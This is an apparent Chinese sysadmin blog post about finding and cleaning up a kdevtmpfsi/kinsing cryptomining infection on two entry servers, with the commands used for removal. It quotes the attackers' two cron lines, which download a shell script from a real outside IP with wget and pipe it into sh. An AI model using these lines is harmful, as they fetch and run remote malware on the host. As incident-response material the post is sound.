在机器上排查问题时,发现了两个异常的定时任务,分别在两台入口机器上
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://185.122.204.197/scg.sh | sh > /dev/null 2>&1
直觉告诉我这不简单,拿IP一查,完犊子了
入口机器被攻击了,二话不说,赶紧清除定时任务 随后继续查看系统日志,/var/log/messages
kdevtmpfsi进程网上一查是挖矿病毒,赶紧查看该进程
一通杀,一通删 处理完,还好进程没起来了,查看定时任务日志(/var/log/cron)
原来挖矿程序一直在运行着,还好这两台机器的配置不高,外加这个病毒好像是遇到了内存堆栈问题,其实一直没跑起来,对机器的影响不大。
ps -ef | grep kdevtmpfsi | grep -v grep
ll /tmp/kdevtmpfsi
ps -ef | grep kinsing | grep -v grep
ll /etc/kinsing
kill -9 16879 15989
rm -rf /tmp/kdevtmpfsi /etc/kinsing
处理的时候尝试把这两个下下来,但是都被公司的防护软件直接删除了,确认病毒无误
事实证明,互联网多么险恶,千万不要在网上裸奔